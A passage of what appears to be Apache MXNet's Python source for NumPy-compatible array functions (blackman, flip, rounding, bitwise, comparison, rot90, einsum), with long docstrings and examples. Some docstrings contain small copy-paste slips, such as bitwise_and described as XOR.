terms of a summation of cosines. It was designed to have close to the
minimal leakage possible. It is close to optimal, only slightly worse
than a Kaiser window.
Parameters
----------
M : int
Number of points in the output window. If zero or less, an
empty array is returned.
dtype : str or numpy.dtype, optional
An optional value type. Default is `float32`. Note that you need
select numpy.float32 or float64 in this operator.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
The window, with the maximum value normalized to one (the value one
appears only if the number of samples is odd).
See Also
--------
hamming, hanning
Notes
-----
The Blackman window is defined as
.. math:: w(n) = 0.42 - 0.5 \cos(2\pi n/{M-1}) + 0.08 \cos(4\pi n/{M-1})
Most references to the Blackman window come from the signal processing
literature, where it is used as one of many windowing functions for
smoothing values. It is also known as an apodization (which means
"removing the foot", i.e. smoothing discontinuities at the beginning
and end of the sampled signal) or tapering function. It is known as a
"near optimal" tapering function, almost as good (by some measures)
as the kaiser window.
References
----------
Blackman, R.B. and Tukey, J.W., (1958) The measurement of power spectra,
Dover Publications, New York.
Oppenheim, A.V., and R.W. Schafer. Discrete-Time Signal Processing.
Upper Saddle River, NJ: Prentice-Hall, 1999, pp. 468-471.
Examples
--------
>>> np.blackman(12)
array([-1.4901161e-08, 3.2606423e-02, 1.5990365e-01, 4.1439798e-01,
7.3604530e-01, 9.6704686e-01, 9.6704674e-01, 7.3604506e-01,
4.1439781e-01, 1.5990359e-01, 3.2606363e-02, -1.4901161e-08])
Plot the window and its frequency response:
>>> import matplotlib.pyplot as plt
>>> window = np.blackman(51)
>>> plt.plot(window.asnumpy())
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.title("blackman window")
Text(0.5, 1.0, 'blackman window')
>>> plt.ylabel("Amplitude")
Text(0, 0.5, 'Amplitude')
>>> plt.xlabel("Sample")
Text(0.5, 0, 'Sample')
>>> plt.show()
"""
if ctx is None:
ctx = current_context()
return _npi.blackman(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def flip(m, axis=None, out=None):
r"""
flip(m, axis=None, out=None)
Reverse the order of elements in an array along the given axis.
The shape of the array is preserved, but the elements are reordered.
Parameters
----------
m : ndarray or scalar
Input array.
axis : None or int or tuple of ints, optional
Axis or axes along which to flip over. The default,
axis=None, will flip over all of the axes of the input array.
If axis is negative it counts from the last to the first axis.
If axis is a tuple of ints, flipping is performed on all of the axes
specified in the tuple.
out : ndarray or scalar, optional
Alternative output array in which to place the result. It must have
the same shape and type as the expected output.
Returns
-------
out : ndarray or scalar
A view of `m` with the entries of axis reversed. Since a view is
returned, this operation is done in constant time.
Examples
--------
>>> A = np.arange(8).reshape((2,2,2))
>>> A
array([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> np.flip(A, 0)
array([[[4, 5],
[6, 7]],
[[0, 1],
[2, 3]]])
>>> np.flip(A, 1)
array([[[2, 3],
[0, 1]],
[[6, 7],
[4, 5]]])
>>> np.flip(A)
array([[[7, 6],
[5, 4]],
[[3, 2],
[1, 0]]])
>>> np.flip(A, (0, 2))
array([[[5, 4],
[7, 6]],
[[1, 0],
[3, 2]]])
"""
from ...numpy import ndarray
if isinstance(m, numeric_types):
return _np.flip(m, axis)
elif isinstance(m, ndarray):
return _npi.flip(m, axis, out=out)
else:
raise TypeError('type {} not supported'.format(str(type(m))))
@set_module('mxnet.ndarray.numpy')
def flipud(m):
r"""
flipud(*args, **kwargs)
Flip array in the up/down direction.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array.
Returns
-------
out : array_like
A view of `m` with the rows reversed. Since a view is
returned, this operation is :math:`\mathcal O(1)`.
See Also
--------
fliplr : Flip array in the left/right direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to ``m[::-1,...]``.
Does not require the array to be two-dimensional.
Examples
--------
>>> A = np.diag(np.array([1.0, 2, 3]))
>>> A
array([[1., 0., 0.],
[0., 2., 0.],
[0., 0., 3.]])
>>> np.flipud(A)
array([[0., 0., 3.],
[0., 2., 0.],
[1., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.flipud(A) == A[::-1,...])
array(True)
>>> np.flipud(np.array([1,2]))
array([2., 1.])
"""
return flip(m, 0)
@set_module('mxnet.ndarray.numpy')
def fliplr(m):
r"""
fliplr(*args, **kwargs)
Flip array in the left/right direction.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Parameters
----------
m : array_like
Input array, must be at least 2-D.
Returns
-------
f : ndarray
A view of `m` with the columns reversed. Since a view
is returned, this operation is :math:`\mathcal O(1)`.
See Also
--------
flipud : Flip array in the up/down direction.
rot90 : Rotate array counterclockwise.
Notes
-----
Equivalent to m[:,::-1]. Requires the array to be at least 2-D.
Examples
--------
>>> A = np.diag(np.array([1.,2.,3.]))
>>> A
array([[1., 0., 0.],
[0., 2., 0.],
[0., 0., 3.]])
>>> np.fliplr(A)
array([[0., 0., 1.],
[0., 2., 0.],
[3., 0., 0.]])
>>> A = np.random.randn(2,3,5)
>>> np.all(np.fliplr(A) == A[:,::-1,...])
array(True)
"""
return flip(m, 1)
@set_module('mxnet.ndarray.numpy')
def around(x, decimals=0, out=None, **kwargs):
r"""
around(x, decimals=0, out=None)
Evenly round to the given number of decimals.
Parameters
----------
x : ndarray or scalar
Input data.
decimals : int, optional
Number of decimal places to round to (default: 0). If
decimals is negative, it specifies the number of positions to
the left of the decimal point.
out : ndarray, optional
Alternative output array in which to place the result. It must have
the same shape and type as the expected output.
Returns
-------
rounded_array : ndarray or scalar
An array of the same type as `x`, containing the rounded values.
A reference to the result is returned.
Notes
-----
For values exactly halfway between rounded decimal values, NumPy
rounds to the nearest even value. Thus 1.5 and 2.5 round to 2.0,
-0.5 and 0.5 round to 0.0, etc.
This function differs from the original numpy.prod in the following aspects:
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot support complex-valued number.
Examples
--------
>>> np.around([0.37, 1.64])
array([ 0., 2.])
>>> np.around([0.37, 1.64], decimals=1)
array([ 0.4, 1.6])
>>> np.around([.5, 1.5, 2.5, 3.5, 4.5]) # rounds to nearest even value
array([ 0., 2., 2., 4., 4.])
>>> np.around([1, 2, 3, 11], decimals=1) # ndarray of ints is returned
array([ 1, 2, 3, 11])
>>> np.around([1, 2, 3, 11], decimals=-1)
array([ 0, 0, 0, 10])
"""
from ...numpy import ndarray
if isinstance(x, numeric_types):
return _np.around(x, decimals, **kwargs)
elif isinstance(x, ndarray):
return _npi.around(x, decimals, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
def round(x, decimals=0, out=None, **kwargs):
r"""
round_(a, decimals=0, out=None)
Round an array to the given number of decimals.
See Also
--------
around : equivalent function; see for details.
"""
from ...numpy import ndarray
if isinstance(x, numeric_types):
return _np.around(x, decimals, **kwargs)
elif isinstance(x, ndarray):
return _npi.around(x, decimals, out=out, **kwargs)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def arctan2(x1, x2, out=None, **kwargs):
r"""
Element-wise arc tangent of ``x1/x2`` choosing the quadrant correctly.
The quadrant (i.e., branch) is chosen so that ``arctan2(x1, x2)`` is
the signed angle in radians between the ray ending at the origin and
passing through the point (1,0), and the ray ending at the origin and
passing through the point (`x2`, `x1`). (Note the role reversal: the
"`y`-coordinate" is the first function parameter, the "`x`-coordinate"
is the second.) By IEEE convention, this function is defined for
`x2` = +/-0 and for either or both of `x1` and `x2` = +/-inf (see
Notes for specific values).
This function is not defined for complex-valued arguments; for the
so-called argument of complex values, use `angle`.
Parameters
----------
x1 : ndarray or scalar
`y`-coordinates.
x2 : ndarray or scalar
`x`-coordinates. `x2` must be broadcastable to match the shape of
`x1` or vice versa.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Array of angles in radians, in the range ``[-pi, pi]``. This is a scalar if
`x1` and `x2` are scalars.
Notes
-----
*arctan2* is identical to the `atan2` function of the underlying
C library. The following special values are defined in the C
standard: [1]_
====== ====== ================
`x1` `x2` `arctan2(x1,x2)`
====== ====== ================
+/- 0 +0 +/- 0
+/- 0 -0 +/- pi
> 0 +/-inf +0 / +pi
< 0 +/-inf -0 / -pi
+/-inf +inf +/- (pi/4)
+/-inf -inf +/- (3*pi/4)
====== ====== ================
Note that +0 and -0 are distinct floating point numbers, as are +inf
and -inf.
This function differs from the original numpy.arange in the following aspects:
- Only support float16, float32 and float64.
References
----------
.. [1] ISO/IEC standard 9899:1999, "Programming language C."
Examples
--------
Consider four points in different quadrants:
>>> x = np.array([-1, +1, +1, -1])
>>> y = np.array([-1, -1, +1, +1])
>>> np.arctan2(y, x) * 180 / np.pi
array([-135., -45., 45., 135.])
Note the order of the parameters. `arctan2` is defined also when `x2` = 0
and at several other special points, obtaining values in
the range ``[-pi, pi]``:
>>> x = np.array([1, -1])
>>> y = np.array([0, 0])
>>> np.arctan2(x, y)
array([ 1.5707964, -1.5707964])
"""
return _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2,
_npi.arctan2_scalar, _npi.rarctan2_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def hypot(x1, x2, out=None, **kwargs):
r"""
Given the "legs" of a right triangle, return its hypotenuse.
Equivalent to ``sqrt(x1**2 + x2**2)``, element-wise. If `x1` or
`x2` is scalar_like (i.e., unambiguously cast-able to a scalar type),
it is broadcast for use with each element of the other argument.
Parameters
----------
x1, x2 : ndarray
Leg of the triangle(s).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned. A tuple (possible only as a
keyword argument) must have length equal to the number of outputs.
Returns
-------
z : ndarray
The hypotenuse of the triangle(s).
This is a scalar if both `x1` and `x2` are scalars.
Notes
-----
This function differs from the original numpy.arange in the following aspects:
- Only support float16, float32 and float64.
Examples
--------
>>> np.hypot(3*np.ones((3, 3)), 4*np.ones((3, 3)))
array([[ 5., 5., 5.],
[ 5., 5., 5.],
[ 5., 5., 5.]])
Example showing broadcast of scalar_like argument:
>>> np.hypot(3*np.ones((3, 3)), [4])
array([[ 5., 5., 5.],
[ 5., 5., 5.],
[ 5., 5., 5.]])
"""
return _ufunc_helper(x1, x2, _npi.hypot, _np.hypot, _npi.hypot_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_and(x1, x2, out=None, **kwargs):
r"""
Compute the bit-wise XOR of two arrays element-wise.
Parameters
----------
x1, x2 : ndarray or scalar
Only integer and boolean types are handled. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which becomes the shape of the output).
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Result.
Examples
--------
>>> np.bitwise_and(13, 17)
1
>>> np.bitwise_and(14, 13)
12
>>> np.bitwise_and(np.array([14,3], dtype='int32'), 13)
array([12, 1], dtype=int32)
>>> np.bitwise_and(np.array([11,7], dtype='int32'), np.array([4,25], dtype='int32'))
array([0, 1], dtype=int32)
>>> np.bitwise_and(np.array([2,5,255], dtype='int32'), np.array([3,14,16], dtype='int32'))
array([ 2, 4, 16], dtype=int32)
>>> np.bitwise_and(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
array([False, True])
"""
return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_xor(x1, x2, out=None, **kwargs):
r"""
Compute the bit-wise XOR of two arrays element-wise.
Parameters
----------
x1, x2 : ndarray or scalar
Only integer and boolean types are handled. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which becomes the shape of the output).
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Result.
Examples
--------
>>> np.bitwise_xor(13, 17)
28
>>> np.bitwise_xor(31, 5)
26
>>> np.bitwise_xor(np.array([31,3], dtype='int32'), 5)
array([26, 6])
>>> np.bitwise_xor(np.array([31,3], dtype='int32'), np.array([5,6], dtype='int32'))
array([26, 5])
>>> np.bitwise_xor(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
array([ True, False])
"""
return _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor, _npi.bitwise_xor_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_or(x1, x2, out=None, **kwargs):
r"""
Compute the bit-wise OR of two arrays element-wise.
Parameters
----------
x1, x2 : ndarray or scalar
Only integer and boolean types are handled. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which becomes the shape of the output).
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Result.
Examples
--------
>>> np.bitwise_or(13, 17)
29
>>> np.bitwise_or(31, 5)
31
>>> np.bitwise_or(np.array([31,3], dtype='int32'), 5)
array([31, 7])
>>> np.bitwise_or(np.array([31,3], dtype='int32'), np.array([5,6], dtype='int32'))
array([31, 7])
>>> np.bitwise_or(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
array([ True, True])
"""
return _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or, _npi.bitwise_or_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def ldexp(x1, x2, out=None, **kwargs):
"""
Returns x1 * 2**x2, element-wise.
The mantissas `x1` and twos exponents `x2` are used to construct
floating point numbers ``x1 * 2**x2``.
Parameters
----------
x1 : ndarray or scalar
Array of multipliers.
x2 : ndarray or scalar, int
Array of twos exponents.
out : ndarray, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
The result of ``x1 * 2**x2``.
This is a scalar if both `x1` and `x2` are scalars.
Notes
-----
Complex dtypes are not supported, they will raise a TypeError.
Different from numpy, we allow x2 to be float besides int.
`ldexp` is useful as the inverse of `frexp`, if used by itself it is
more clear to simply use the expression ``x1 * 2**x2``.
Examples
--------
>>> np.ldexp(5, np.arange(4))
array([ 5., 10., 20., 40.])
"""
return _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp, _npi.ldexp_scalar, _npi.rldexp_scalar, out)
@set_module('mxnet.ndarray.numpy')
def inner(a, b):
r"""
Inner product of two arrays.
Ordinary inner product of vectors for 1-D arrays (without complex
conjugation), in higher dimensions a sum product over the last axes.
Parameters
----------
a, b : ndarray
If `a` and `b` are nonscalar, their last dimensions must match.
Returns
-------
out : ndarray
`out.shape = a.shape[:-1] + b.shape[:-1]`
Raises
------
ValueError
If the last dimension of `a` and `b` has different size.
See Also
--------
tensordot : Sum products over arbitrary axes.
dot : Generalised matrix product, using second last dimension of `b`.
einsum : Einstein summation convention.
Notes
-----
For vectors (1-D arrays) it computes the ordinary inner-product::
np.inner(a, b) = sum(a[:]*b[:])
More generally, if `ndim(a) = r > 0` and `ndim(b) = s > 0`::
np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1))
or explicitly::
np.inner(a, b)[i0,...,ir-1,j0,...,js-1]
= sum(a[i0,...,ir-1,:]*b[j0,...,js-1,:])
In addition `a` or `b` may be scalars, in which case::
np.inner(a,b) = a*b
Examples
--------
Ordinary inner product for vectors:
>>> a = np.array([1,2,3])
>>> b = np.array([0,1,0])
>>> np.inner(a, b)
2
A multidimensional example:
>>> a = np.arange(24).reshape((2,3,4))
>>> b = np.arange(4)
>>> np.inner(a, b)
array([[ 14, 38, 62],
[ 86, 110, 134]])
"""
return tensordot(a, b, [-1, -1])
@set_module('mxnet.ndarray.numpy')
def outer(a, b):
r"""
Compute the outer product of two vectors.
Given two vectors, ``a = [a0, a1, ..., aM]`` and
``b = [b0, b1, ..., bN]``,
the outer product [1]_ is::
[[a0*b0 a0*b1 ... a0*bN ]
[a1*b0 .
[ ... .
[aM*b0 aM*bN ]]
Parameters
----------
a : (M,) ndarray
First input vector. Input is flattened if
not already 1-dimensional.
b : (N,) ndarray
Second input vector. Input is flattened if
not already 1-dimensional.
Returns
-------
out : (M, N) ndarray
``out[i, j] = a[i] * b[j]``
See also
--------
inner
einsum : ``einsum('i,j->ij', a.ravel(), b.ravel())`` is the equivalent.
ufunc.outer : A generalization to N dimensions and other operations.
``np.multiply.outer(a.ravel(), b.ravel())`` is the equivalent.
References
----------
.. [1] : G. H. Golub and C. F. Van Loan, *Matrix Computations*, 3rd
ed., Baltimore, MD, Johns Hopkins University Press, 1996,
pg. 8.
Examples
--------
Make a (*very* coarse) grid for computing a Mandelbrot set:
>>> rl = np.outer(np.ones((5,)), np.linspace(-2, 2, 5))
>>> rl
array([[-2., -1., 0., 1., 2.],
[-2., -1., 0., 1., 2.],
[-2., -1., 0., 1., 2.],
[-2., -1., 0., 1., 2.],
[-2., -1., 0., 1., 2.]])
"""
return tensordot(a.flatten(), b.flatten(), 0)
@set_module('mxnet.ndarray.numpy')
def vdot(a, b):
r"""
Return the dot product of two vectors.
Note that `vdot` handles multidimensional arrays differently than `dot`:
it does *not* perform a matrix product, but flattens input arguments
to 1-D vectors first. Consequently, it should only be used for vectors.
Parameters
----------
a : ndarray
First argument to the dot product.
b : ndarray
Second argument to the dot product.
Returns
-------
output : ndarray
Dot product of `a` and `b`.
See Also
--------
dot : Return the dot product without using the complex conjugate of the
first argument.
Examples
--------
Note that higher-dimensional arrays are flattened!
>>> a = np.array([[1, 4], [5, 6]])
>>> b = np.array([[4, 1], [2, 2]])
>>> np.vdot(a, b)
30
>>> np.vdot(b, a)
30
>>> 1*4 + 4*1 + 5*2 + 6*2
30
"""
return tensordot(a.flatten(), b.flatten(), 1)
@set_module('mxnet.ndarray.numpy')
def equal(x1, x2, out=None):
"""
Return (x1 == x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
not_equal, greater_equal, less_equal, greater, less
Examples
--------
>>> np.equal(np.ones(2, 1)), np.zeros(1, 3))
array([[False, False, False],
[False, False, False]])
>>> np.equal(1, np.ones(1))
array([ True])
"""
return _ufunc_helper(x1, x2, _npi.equal, _np.equal, _npi.equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def not_equal(x1, x2, out=None):
"""
Return (x1 != x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
equal, greater, greater_equal, less, less_equal
Examples
--------
>>> np.not_equal(np.ones(2, 1)), np.zeros(1, 3))
array([[ True, True, True],
[ True, True, True]])
>>> np.not_equal(1, np.ones(1))
array([False])
"""
return _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal, _npi.not_equal_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def greater(x1, x2, out=None):
"""
Return the truth value of (x1 > x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
equal, greater, greater_equal, less, less_equal
Examples
--------
>>> np.greater(np.ones(2, 1)), np.zeros(1, 3))
array([[ True, True, True],
[ True, True, True]])
>>> np.greater(1, np.ones(1))
array([False])
"""
return _ufunc_helper(x1, x2, _npi.greater, _np.greater, _npi.greater_scalar,
_npi.less_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less(x1, x2, out=None):
"""
Return the truth value of (x1 < x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
equal, greater, greater_equal, less, less_equal
Examples
--------
>>> np.less(np.ones(2, 1)), np.zeros(1, 3))
array([[ True, True, True],
[ True, True, True]])
>>> np.less(1, np.ones(1))
array([False])
"""
return _ufunc_helper(x1, x2, _npi.less, _np.less, _npi.less_scalar, _npi.greater_scalar, out)
@set_module('mxnet.ndarray.numpy')
def greater_equal(x1, x2, out=None):
"""
Return the truth value of (x1 >= x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
equal, greater, greater_equal, less, less_equal
Examples
--------
>>> np.greater_equal(np.ones(2, 1)), np.zeros(1, 3))
array([[ True, True, True],
[ True, True, True]])
>>> np.greater_equal(1, np.ones(1))
array([True])
"""
return _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal, _npi.greater_equal_scalar,
_npi.less_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def less_equal(x1, x2, out=None):
"""
Return the truth value of (x1 <= x2) element-wise.
Parameters
----------
x1, x2 : ndarrays or scalars
Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
a common shape (which becomes the shape of the output).
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array of type bool, element-wise comparison of `x1` and `x2`.
This is a scalar if both `x1` and `x2` are scalars.
See Also
--------
equal, greater, greater_equal, less, less_equal
Examples
--------
>>> np.less_equal(np.ones(2, 1)), np.zeros(1, 3))
array([[False, False, False],
[False, False, False]])
>>> np.less_equal(1, np.ones(1))
array([True])
"""
return _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal, _npi.less_equal_scalar,
_npi.greater_equal_scalar, out)
@set_module('mxnet.ndarray.numpy')
def rot90(m, k=1, axes=(0, 1)):
"""
Rotate an array by 90 degrees in the plane specified by axes.
Rotation direction is from the first towards the second axis.
Parameters
----------
m : ndarray
Array of two or more dimensions.
k : integer
Number of times the array is rotated by 90 degrees.
axes: (2,) array_like
The array is rotated in the plane defined by the axes.
Axes must be different.
Returns
-------
y : ndarray
A rotated view of `m`.
-----
rot90(m, k=1, axes=(1,0)) is the reverse of rot90(m, k=1, axes=(0,1))
rot90(m, k=1, axes=(1,0)) is equivalent to rot90(m, k=-1, axes=(0,1))
Examples
--------
>>> m = np.array([[1,2],[3,4]], 'int')
>>> m
array([[1, 2],
[3, 4]], dtype=int64)
>>> np.rot90(m)
array([[2, 4],
[1, 3]], dtype=int64)
>>> np.rot90(m, 2)
array([[4, 3],
[2, 1]], dtype=int64)
>>> m = np.arange(8).reshape((2,2,2))
>>> np.rot90(m, 1, (1,2))
array([[[1., 3.],
[0., 2.]],
[[5., 7.],
[4., 6.]]])
"""
return _npi.rot90(m, k=k, axes=axes)
@set_module('mxnet.ndarray.numpy')
def einsum(*operands, **kwargs):
r"""
einsum(subscripts, *operands, out=None, optimize=False)
Evaluates the Einstein summation convention on the operands.
Using the Einstein summation convention, many common multi-dimensional,
linear algebraic array operations can be represented in a simple fashion.
In *implicit* mode `einsum` computes these values.
In *explicit* mode, `einsum` provides further flexibility to compute
other array operations that might not be considered classical Einstein
summation operations, by disabling, or forcing summation over specified
subscript labels.
See the notes and examples for clarification.
Parameters
----------
subscripts : str
Specifies the subscripts for summation as comma separated list of
subscript labels. An implicit (classical Einstein summation)
calculation is performed unless the explicit indicator '->' is
included as well as subscript labels of the precise output form.
operands : list of ndarray
These are the arrays for the operation.
out : ndarray, optional
If provided, the calculation is done into this array.
optimize : {False, True}, optional
Controls if intermediate optimization should occur. No optimization
will occur if False. Defaults to False.
Returns
-------
output : ndarray
The calculation based on the Einstein summation convention.
Notes
-----
The Einstein summation convention can be used to compute
many multi-dimensional, linear algebraic array operations. `einsum`
provides a succinct way of representing these.
A non-exhaustive list of these operations,
which can be computed by `einsum`, is shown below along with examples:
* Trace of an array, :py:func:`np.trace`.
* Return a diagonal, :py:func:`np.diag`.
* Array axis summations, :py:func:`np.sum`.
* Transpositions and permutations, :py:func:`np.transpose`.
* Matrix multiplication and dot product, :py:func:`np.matmul` :py:func:`np.dot`.
* Vector inner and outer products, :py:func:`np.inner` :py:func:`np.outer`.
* Broadcasting, element-wise and scalar multiplication, :py:func:`np.multiply`.
* Tensor contractions, :py:func:`np.tensordot`.
The subscripts string is a comma-separated list of subscript labels,
where each label refers to a dimension of the corresponding operand.
Whenever a label is repeated it is summed, so ``np.einsum('i,i', a, b)``
is equivalent to :py:func:`np.inner(a,b) <np.inner>`. If a label
appears only once, it is not summed, so ``np.einsum('i', a)`` produces a
view of ``a`` with no changes. A further example ``np.einsum('ij,jk', a, b)``
describes traditional matrix multiplication and is equivalent to
:py:func:`np.matmul(a,b) <np.matmul>`. Repeated subscript labels in one
operand take the diagonal. For example, ``np.einsum('ii', a)`` is equivalent
to :py:func:`np.trace(a) <np.trace>`.
In *implicit mode*, the chosen subscripts are important
since the axes of the output are reordered alphabetically. This
means that ``np.einsum('ij', a)`` doesn't affect a 2D array, while
``np.einsum('ji', a)`` takes its transpose. Additionally,
``np.einsum('ij,jk', a, b)`` returns a matrix multiplication, while,
``np.einsum('ij,jh', a, b)`` returns the transpose of the
multiplication since subscript 'h' precedes subscript 'i'.
In *explicit mode* the output can be directly controlled by
specifying output subscript labels. This requires the
identifier '->' as well as the list of output subscript labels.
This feature increases the flexibility of the function since
summing can be disabled or forced when required. The call
``np.einsum('i->', a)`` is like :py:func:`np.sum(a, axis=-1) <np.sum>`,
and ``np.einsum('ii->i', a)`` is like :py:func:`np.diag(a) <np.diag>`.
The difference is that `einsum` does not allow broadcasting by default.
Additionally ``np.einsum('ij,jh->ih', a, b)`` directly specifies the
order of the output subscript labels and therefore returns matrix
multiplication, unlike the example above in implicit mode.
To enable and control broadcasting, use an ellipsis. Default
NumPy-style broadcasting is done by adding an ellipsis
to the left of each term, like ``np.einsum('...ii->...i', a)``.
To take the trace along the first and last axes,
you can do ``np.einsum('i...i', a)``, or to do a matrix-matrix
product with the left-most indices instead of rightmost, one can do
``np.einsum('ij...,jk...->ik...', a, b)``.
When there is only one operand, no axes are summed, and no output
parameter is provided, a view into the operand is returned instead
of a new array. Thus, taking the diagonal as ``np.einsum('ii->i', a)``
produces a view.
The ``optimize`` argument which will optimize the contraction order
of an einsum expression. For a contraction with three or more operands this
can greatly increase the computational efficiency at the cost of a larger
memory footprint during computation.
Typically a 'greedy' algorithm is applied which empirical tests have shown
returns the optimal path in the majority of cases. 'optimal' is not supported
for now.
This function differs from the original `numpy.einsum
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.einsum.html>`_ in
the following way(s):
- Does not support 'optimal' strategy
- Does not support the alternative subscript like
`einsum(op0, sublist0, op1, sublist1, ..., [sublistout])`
- Does not produce view in any cases
Examples
--------
>>> a = np.arange(25).reshape(5,5)
>>> b = np.arange(5)
>>> c = np.arange(6).reshape(2,3)
Trace of a matrix:
>>> np.einsum('ii', a)
array(60.)
Extract the diagonal (requires explicit form):
>>> np.einsum('ii->i', a)
array([ 0., 6., 12., 18., 24.])
Sum over an axis (requires explicit form):
>>> np.einsum('ij->i', a)
array([ 10., 35., 60., 85., 110.])
>>> np.sum(a, axis=1)
array([ 10., 35., 60., 85., 110.])
For higher dimensional arrays summing a single axis can be done with ellipsis:
>>> np.einsum('...j->...', a)
array([ 10., 35., 60., 85., 110.])
Compute a matrix transpose, or reorder any number of axes:
>>> np.einsum('ji', c)
array([[0., 3.],
[1., 4.],
[2., 5.]])
>>> np.einsum('ij->ji', c)
array([[0., 3.],
[1., 4.],
[2., 5.]])
>>> np.transpose(c)
array([[0., 3.],
[1., 4.],
[2., 5.]])
Vector inner products:
>>> np.einsum('i,i', b, b)
array(30.)
Matrix vector multiplication:
>>> np.einsum('ij,j', a, b)
array([ 30., 80., 130., 180., 230.])
>>> np.dot(a, b)
array([ 30., 80., 130., 180., 230.])
>>> np.einsum('...j,j', a, b)
array([ 30., 80., 130., 180., 230.])
Broadcasting and scalar multiplication:
>>> np.einsum('..., ...', np.array(3), c)
array([[ 0., 3., 6.],
[ 9., 12., 15.]])
